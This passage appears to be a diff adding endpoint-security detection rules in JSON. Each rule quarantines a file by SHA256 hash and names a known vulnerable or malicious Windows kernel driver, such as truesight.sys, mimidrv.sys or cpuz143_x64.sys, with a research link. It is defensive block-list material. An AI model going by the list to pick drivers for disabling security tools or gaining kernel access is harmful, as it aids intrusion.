+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620313Z",
+ "creation_date": "2026-03-23T11:45:29.620315Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620321Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f55c148bb27c14408cf0f16f344abcd63539174ac855e510a42d78cfaec451c",
+ "comment": "Vulnerable Kernel Driver (aka amsdk.sys) [https://www.loldrivers.io/drivers/a285591e-ad3c-46a3-a648-c58589ff5efc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41e43ac2-3a79-5a07-9afd-24c517047628",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828347Z",
+ "creation_date": "2026-03-23T11:45:30.828349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "965e2a08a3ad054cd8356ccdd7513613902ce3be7bcc262ca156e9db2cf0f4db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41e8b632-5520-5884-9050-4cdc14e50047",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147040Z",
+ "creation_date": "2026-03-23T11:45:32.147042Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51ad864af75441b537ab0a37cf045f19117eab5e10fc179ef1e8164d9ef5d2e0",
+ "comment": "Vulnerable Kernel Driver (aka ThrottleBlood.sys) [https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41f8d812-ab1a-5ebd-b072-d7c30d506666",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154747Z",
+ "creation_date": "2026-03-23T11:45:31.154751Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154759Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e852b54ff7357691235f9a359f8ec625fafc784f991acde0b3973621a06fbb6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41fa1afb-8212-5384-bd77-241a7e9f6634",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817841Z",
+ "creation_date": "2026-03-23T11:45:30.817844Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee067313bd75acae24e1661cb6807ed6148f9af34542ed77578144b21f5c8da1",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41fd5ea9-cab5-5332-8ab8-cd194e0a08d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826443Z",
+ "creation_date": "2026-03-23T11:45:30.826445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826451Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5db520afe0278928b9b70b22e991b331d381ab959e4bb1472266dc57c9bd8e40",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42004600-13ad-59bb-a2e0-9fa0a639aba7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610475Z",
+ "creation_date": "2026-03-23T11:45:29.610477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610482Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "600a2119657973112025db3c0eeab2e69d528bccfeed75f40c6ef50b059ec8a0",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "420221e4-9d20-55a2-a482-f1a335387419",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479666Z",
+ "creation_date": "2026-03-23T11:45:31.479670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1970441341b44c20f80b2517a42db7623dc62d57458e74894593eadca0acc9e9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4208851a-654a-5120-873e-44354ba7f6cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498308Z",
+ "creation_date": "2026-03-23T11:45:31.498311Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b6d6ed719ae1555fc75a05425ebc9ce79b7f47b36baffa1014e1e3d413a2f07",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4209a3e6-61c9-586c-9006-c316df385742",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829412Z",
+ "creation_date": "2026-03-23T11:45:30.829414Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e247b7a0e986e0d9660d85b90a2f1c4d8dc3e515c339fa1e936898f86e096336",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "420ff32a-3448-5184-b3b9-6e95c9821753",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983158Z",
+ "creation_date": "2026-03-23T11:45:29.983160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a000d211840cb8fbcbf95c334b1d04eadb45ba03b0413c96472e47e9e22413ff",
+ "comment": "Malicious Kernel Driver (aka daxin_blank.sys) [https://www.loldrivers.io/drivers/7e80423f-8b30-4ee2-b904-9f5421826a8c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "421114ff-0593-5dc3-bdbf-f4925659789f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468078Z",
+ "creation_date": "2026-03-23T11:45:30.468082Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468091Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6789e1a2e0d23528a91e49851bd95bceb6ffe9927f34b52a78ecc2b1d4bc13b8",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4215f19c-f133-58ac-8a9f-29c91f4935e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807520Z",
+ "creation_date": "2026-03-23T11:45:31.807523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807528Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7d7e34a5c9298104911195dd590f209e47b62d81792aac6a1acc2e9c9cb4a86",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42279296-c72e-5724-8287-cc4786a28e59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832077Z",
+ "creation_date": "2026-03-23T11:45:30.832079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87fbc22a0d7a65cf3078f1ff46f7b82922a3d8a5cf9b7e5d4c5bb885d1fc7009",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42318282-1774-5511-a02a-11bc363b97f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978283Z",
+ "creation_date": "2026-03-23T11:45:29.978285Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978290Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b55b35284346bbcdc2754e60517e1702f0286770a080ee6ff3e7eed1cab812a",
+ "comment": "Vulnerable Kernel Driver (aka nt5.sys) [https://www.loldrivers.io/drivers/193df066-c27c-4343-a4eb-ad2ac417a4cc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4234a72b-d951-583b-a045-1d58879d60a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982200Z",
+ "creation_date": "2026-03-23T11:45:29.982202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982207Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa7f25d4857a4b443222934bcbb0904348a799fc884096f653d921817c0b34aa",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "423cbc49-7518-5b34-8dff-e3a5c7d2a54c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829255Z",
+ "creation_date": "2026-03-23T11:45:30.829257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3171fc751a20680b3eb75b6a1a4767cbe4a8296c3b4f7d93781bfe176e5a6b75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "424203b8-e331-5d89-a3ad-fef08d05be5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981977Z",
+ "creation_date": "2026-03-23T11:45:29.981979Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981985Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e",
+ "comment": "Malicious Kernel Driver (aka wantd_6.sys) [https://www.loldrivers.io/drivers/127cde1d-905e-4c67-a2c3-04ea4deaea7d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4245fd3a-e2b1-576c-979d-a85babbe99ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818701Z",
+ "creation_date": "2026-03-23T11:45:30.818703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5fc66378fe68a380ccfab3521657b38912ca1fe5a8d7c857f591e928ab0b4208",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4249144b-9ad1-50e6-aa0f-e5203351323a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154639Z",
+ "creation_date": "2026-03-23T11:45:31.154641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f35a53c8e43f4738162ce8fed947c77e435295084ed517aeb0ab605f3c31078e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "425a2d2d-2798-5660-9769-bba4b58a2fcb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498282Z",
+ "creation_date": "2026-03-23T11:45:31.498286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "221a23982eb9f68ce42f415449c29aafbfdc5b185ec5db7907c3036fd9e6f5a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "425b5c62-7e16-5833-8e63-0dd9cb8c1a96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971336Z",
+ "creation_date": "2026-03-23T11:45:29.971339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76614f2e372f33100a8d92bf372cdbc1e183930ca747eed0b0cf2501293b990a",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "425cde7b-40c5-548a-835a-e9764a4dc553",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974927Z",
+ "creation_date": "2026-03-23T11:45:29.974929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
